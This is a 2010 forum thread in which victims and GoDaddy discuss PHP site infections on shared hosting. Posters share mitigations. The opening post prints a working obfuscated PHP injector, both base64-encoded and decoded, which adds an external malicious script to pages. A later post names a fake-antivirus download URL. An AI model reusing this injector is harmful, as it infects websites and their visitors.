• 0

GoDaddy Got Hacked Yesterday


Question

I'm sure some of you may be aware of the situation But as of yesterday (May 1, 2010) at around 2 AM, there was a major hack attempt on GoDaddy. At about 10 AM, GoDaddy Tweeted about this matter (See Tweet: http://twitter.com/GoDaddy/status/13199601776). The issue has not affected all of their hosting accounts and is still being investigated. The issue is not due to a flaw in WordPress as GoDaddy claims, a friend has a site that only has her own hand written PHP code and nothing more. Despite taking my friend is super obsessive about security and knows for a fact her FTP account was not compromised, she found all the PHP files on her server to be infected, even those not publicly available.

When you view the source of any of the PHP pages through the browser, you see the following line inserted just before the </body> tag:

&lt;script src="https://kdjkfjskdfjlskdjf.com/kp.php"&gt;&lt;/script&gt;

When you examine each of the PHP pages, you see this line at the top of all of them (This was the hacked code):

&lt;?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5clpHcHJabXB6YTJSbWFteHphMlJxWmk1amIyMHZhM0F1Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?&gt;

When you decode this, it equates to:

if(function_exists('ob_start')&amp;&amp;!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;
	if(!function_exists('mrobh')){
		if(!function_exists('gml')){
			function gml(){
				if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&amp;&amp; (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
					return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9rZGprZmpza2Rmamxza2RqZi5jb20va3AucGhwIj48L3NjcmlwdD4=");
				}
				return "";
			}
		}
        if(!function_exists('gzdecode')){
			function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
				$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
				$RBE4C4D037E939226F65812885A53DAD9=10;
				$RA3D52E52A48936CDE0F5356BB08652F2=0;
      			if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;4){
      				$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
       				$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
       				$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
       			}
    			if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;8){
					$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
      			}
      			if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;16){
      				$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
      			}
				if($R30B2AB8DC1496D06B230A71D8962AF5D&amp;2){
					$RBE4C4D037E939226F65812885A53DAD9+=2;
      			}
      			$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
      			if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
      				$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
      			}
      			return $R034AE2AB94F99CC81B389A1822DA3353;
     		}
		}
		function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
			Header('Content-Encoding: none');
			$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
			if(preg_match('/\&lt;\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
				return preg_replace('/(\&lt;\/body[^\&gt;]*\&gt;)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
			}else{
				return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
			}
		}
		ob_start('mrobh');
	}
}

I don't really understand what this code exactly does. Can any PHP code experts decipher it?

GoDaddy claimed they will investigate the issue but when my friend called, she found the tech support staff were completely oblivious to the matter.

So, if you are one of the unlucky ones whose server was a part of the attack, please check the bottom of your source code to make sure the <script> tag isn't there. Otherwise contact GoDaddy and complain.

Link to comment
https://www.neowin.net/forum/topic/897610-godaddy-got-hacked-yesterday/
Share on other sites

Recommended Posts

  • 0

And seriously, to expand on what andrew said.

The guy asked for what other domains you knew of that had been compromised, you could have provided that here or sent him a pm. instead you came up with another anonymous godaddy friend without wordpress. it could very well be they have unused wordpress files on the server or that wjatever the do use is based on wordpress

Clearly, you have never called GoDaddy tech support before. They know the sites have have been told on the phone. I have no need to mention them here.

Anyway, GoDaddy don't need to know about any more domains, considering all the net chatter about this enter issue.

All they need to do is lock does their accounts so one account cannot write to another. PERIOD! PROBLEM SOLVED!

  • 0

Apology? How old are you son? Apology for speaking the truth? Only on Neowin!

Thereal issue is responsibility.

///cut////

I hope GoDaddy accept responsibility for it's failing and accepts whatit needs to do to set things right by it's customers.

But if there are back handers going out (as evident by theapologist for the GoDaddy's apologist) then I highly doubt it.

GoFigure GoDaddy!

I think you what we call in UK a 'Bigoted' person. Note to ALL I never called him a 'Bigot'.

  • 0

Hi,

I searched few days and I got some conclusion hope help somebody.

1. Goddady have a executing multi-extension files security hole example:

somthing.php.jpg

This is a known security issue:

http://core.trac.wordpress.org/ticket/11122

to fix that on GoDaddy try add this in .htaccess

RemoveHandler application/x-httpd-php .php

<FilesMatch "\.(php|php5|php4|php3|phtml|phpt)$">

SetHandler x-httpd-php5

</FilesMatch>

<FilesMatch "\.phps$">

SetHandler x-httpd-php5-source

</FilesMatch>

I tested on my site and seams that work.

2. The injections affected two my sites with custom cms, one site do not have upload at all (no wordpress, no joomla).

3. I find some hacking tool on my account with all nice staff for injection things.. I think they passes deep

4. put all php files to unwritable seems to stop injection

I think that injections come from inside server becouse GoDaddy hosting will easly find it if starts from outside.

Hope this can help

  • 0

Apology? How old are you son? Apology for speaking the truth? Only on Neowin!

<< SNIP >>

This post is full of false claims, no evidence or proof of any of this, and inaccurate claims against GoDaddy.

I suggest you just stop pointing fingers and start telling your friends that they are lying.

And you have absolutely NO proof that GoDaddy has never gone around the Internet and signed up on other forums to speak directly to people.

If I were you, I would just let this go. You're trying to turn nothing into something, and you don't even have an account with GoDaddy! So just stop talking.

And seriously, to expand on what andrew said.

The guy asked for what other domains you knew of that had been compromised, you could have provided that here or sent him a pm. instead you came up with another anonymous godaddy friend without wordpress. it could very well be they have unused wordpress files on the server or that wjatever the do use is based on wordpress

To expand on what you said, the server block, since this is a shared host, could contain WordPress files. Each user does not have to have WordPress instead, but anyone else using the same server as you could have WordPress installed, compromising the entire server.

  • Like 2
  • 0

I just found a very detailed page related to this: http://www.wpsecuritylock.com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/

It includes some findings, recommendations and the most detailed guide on how to remove the problem. I also checked slashdot and the wp problem reports started since March..

  • 0

My Godaddy site just got hacked also. It is just a simple PHP site, mostly html with .php page extensions. All the php files were hacked. Godaddy is in an extreme state of denial. They just sent a form email implying that it was somehow my fault. Definitely not just a Wordpress problem.

zyxwvut,

Thank you for posting. If you'll please PM your domain, I'll have our Security Team investigate the matter.

Salem

  • 0

Hi,

A little tutorial to see if you have a issue executing multi-extension files.

Create a file with name "info.php.jpg" and add in if following code:

<?php

phpinfo();

?>

upload to your webpage and try to get it.(www.yourdomain.com/info.php.jpg)

if your file is parsed (you will see a php information) insted of get an inexistent image you have this security issue.

What this means?

This means that if you have upload file funcionality hacker can upload script on your site and run it.

It not based on single cms (wordpress, joomla...) is general issue.

I find a script that look like a image inside but is a tool.

This issue is not related to this attack maybe, but is security issue that you can check and prevent to you file injection.

Above I posted a fix for GoDaddy that is little bit different from wordpress fix.

Hope this can help somebody... and safe some working hours ;)

  • 0

Hrm, i test that on my linux box, the virus fake me that i have virus on my computer but its windows design and layout but im on linux heh, virus is force me to visit www2.warezforpc37-pd.xorg.pl then download packupdate_build107_2045.exe (the link go to virustotal.com, Im just tell you its safe link)

fake2i.jpg

I read whole code, but i dont want paste to this forum, its might block by anti-virus. :)

  • 0

UPDATE! According to: http://www.wpsecuritylock.com/dangerous-malware-alert-hacked-godaddy-responds/

there is a Godaddy response:

We do take our position as an Internet leader seriously, especially when it comes to security. This is why we are going the extra mile to get the word out. We appreciate your invitation to answer the question, 'What is Go Daddy doing to help?'

As the world's #1 Web host provider, Go Daddy is a logical target for speculation and misinformation. With this exploitation issue, both the prevention and the cure are not under our control -- because the customer decides whether to update the software they run. (If you think about it, it's like forgetting to lock your car and blaming the auto manufacturer when your car is stolen.) Our job is to help identify issues and inform our customers about how they can protect their sites.

This is why we are working to proactively communicate and educate Internet users about this situation.

Here are a few of the initiatives we have going right now.

As a service to our customers and all Internet users:

* Go Daddy scanned our 4M hosted sites to identify sites impacted (we did this immediately upon learning about the issue last week, and again over the weekend).

* Contacting Go Daddy customers impacted by phone and/or email to let them know how to protect their sites (in some cases, we've alerted them even before they realize they are impacted).

* Go Daddy is also taking the leadership role with educational communication -- posting Help Articles to our Community & Customer Service pages to provide "1,2,3 Info" on how to properly update software.

We'll update the Help Articles as needed and also be posting another Help Article with actual illustrations/screen shots to make the security update process easy for even the most remedial of Web users to follow.

Phil Stuart

Go Daddy Communications

  • 0

GoDaddy specifically made their Neowin account to comment on this thread and to address me directly. Clearly they are worried and don't have a clue what is going. Funny actually.

I need to comment on this. The only reason GoDaddy came here was because I had tweeted about it and they directly replied to my tweet which had a link to Neowin in it. The same person who replied here is the same person who manages GoDaddy's Twitter account. He doesn't need to be a tech agent to do this--he even states his position within GoDaddy is for social-related purposes.. Which would include this forum.

:pinch: :blink: :whistle:

  • 0

I need to comment on this. The only reason GoDaddy came here was because I had tweeted about it and they directly replied to my tweet which had a link to Neowin in it. The same person who replied here is the same person who manages GoDaddy's Twitter account. He doesn't need to be a tech agent to do this--he even states his position within GoDaddy is for social-related purposes.. Which would include this forum.

:pinch: :blink: :whistle:

I dont think so, maybe they have access to Google.com, this is not a new incident. Also Neowin is not the official support tool of Godaddy, if they follow a standard for providing services like ITIL, they would not need to ask to send the affected domains via PM, they would ask you to use the formal methods for asking for support (phone,email support). Thats why sometimes I doubt if the user Godaddy is really from @godaddy.com

I dont think they want to discuss (or disclose) attack information in public forums, they will just say something like: "Stay calm", "We are working on it",blah blah so just wait until it is sorted or for any official communication (if any).

In the meanwhile lets see what information (and DISinformation) we found about it.

  • 0

I dont think so, maybe they have access to Google.com, this is not a new incident. Also Neowin is not the official support tool of Godaddy, if they follow a standard for providing services like ITIL, they would not need to ask to send the affected domains via PM, they would ask you to use the formal methods for asking for support (phone,email support). Thats why sometimes I doubt if the user Godaddy is really from @godaddy.com

I dont think they want to discuss (or disclose) attack information in public forums, they will just say something like: "Stay calm", "We are working on it",blah blah so just wait until it is sorted or for any official communication (if any).

In the meanwhile lets see what information (and DISinformation) we found about it.

I don't care what you think--that's what happened. @GoDaddy replied to me minutes after I tweeted about the thread/blog on Neowin. Moments later they joined Neowin and posted a response.

Perhaps you don't understand the part about social mediums. People are hired for specific positions. They don't need to be involved with any technical resolutions. Did you read his post where he stated his job position? "Go Daddy's Social Media Team" THIS IS HIS JOB. He can post on as many forums as he sees fit if he is looking to help people resolve any issues that are present with GoDaddy. He can reply to as many people on Twitter as he has to. Or any other social networking platform.

It's evident that you only came to Neowin to post in this GoDaddy thread for one reason. Stop being a nuisance and go back to the hole you came from.

  • 0

I don't care what you think--that's what happened. @GoDaddy replied to me minutes after I tweeted about the thread/blog on Neowin. Moments later they joined Neowin and posted a response.

Perhaps you don't understand the part about social mediums. People are hired for specific positions. They don't need to be involved with any technical resolutions. Did you read his post where he stated his job position? "Go Daddy's Social Media Team" THIS IS HIS JOB. He can post on as many forums as he sees fit if he is looking to help people resolve any issues that are present with GoDaddy. He can reply to as many people on Twitter as he has to. Or any other social networking platform.

It's evident that you only came to Neowin to post in this GoDaddy thread for one reason. Stop being a nuisance and go back to the hole you came from.

Oh my god, another kid posting on neowin... Great you got the credit I will send you my diploma

I did not know the companies are looking everywhere on the internet on how to solve the problems, they have their own trained support staff.

I can read his job position, but did you check: http://www.godaddy.com/SocialMedia/social-media.aspx?ci=17624 ?

I dont see neowin listed, then carefully read the description of the 4 social networks. Godaddy social team is just for MARKETING (and apparently also for calming the scared existant and potential customers of issues like this)

  • 0

Oh my god, another kid posting on neowin... Great you got the credit I will send you my diploma

I did not know the companies are looking everywhere on the internet on how to solve the problems, they have their own trained support staff.

I can read his job position, but did you check: http://www.godaddy.com/SocialMedia/social-media.aspx?ci=17624 ?

I dont see neowin listed, then carefully read the description of the 4 social networks. Godaddy social team is just for MARKETING (and apparently also for calming the scared existant and potential customers of issues like this)

really... Gee the rest of us didn't figure that out at the point when he said he was going to forward it to the actual tech staff in his first post.... :rolleyes:

it's what social media staff is for, he never tried to do any tech support or said he would. basically, he's like an escalation, without needing to actually call them and fight with the phone guys and then fight with the supervisor.

  • 0

I need to comment on this. The only reason GoDaddy came here was because I had tweeted about it and they directly replied to my tweet which had a link to Neowin in it. The same person who replied here is the same person who manages GoDaddy's Twitter account. He doesn't need to be a tech agent to do this--he even states his position within GoDaddy is for social-related purposes.. Which would include this forum. :pinch: :blink: :whistle:

Well thanks for bringing them here :)

I had a one-on-one phone conversation with Todd Redfoot, a security expert at GoDaddy, be sure to read this:

https://www.neowin.net/news/exclusive-wordpress-exploit-explained

  • 0

The break-fix Solution will be enough just for this attack, however GoDaddy needs to isolate the accounts and tighten the privileges in order to avoiD future problems (cause some users complain that their site were "infected" even without having WP installed, also other users upgraded to. 2.9.2 and were "reinfected")

  • 0

The break-fix Solution will be enough just for this attack, however GoDaddy needs to isolate the accounts and tighten the privileges in order to avoiD future problems (cause some users complain that their site were "infected" even without having WP installed, also other users upgraded to. 2.9.2 and were "reinfected")

Speaking with the security expert at GoDaddy, Todd Redfoot, he mentioned that they did not see the exploit on users accounts that were running WordPress 2.9.2.

  • 0

Speaking with the security expert at GoDaddy, Todd Redfoot, he mentioned that they did not see the exploit on users accounts that were running WordPress 2.9.2.

Just to let you know that my site was infected... I dont have any wordpress installation (not any contact with wordpress).

I think is a GoDaddy security issue.

Open source project is commonly used by hackers to trigger this kind of attacks but we have to take in account that exist infected sites without wordpress.

Hope this helps...

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.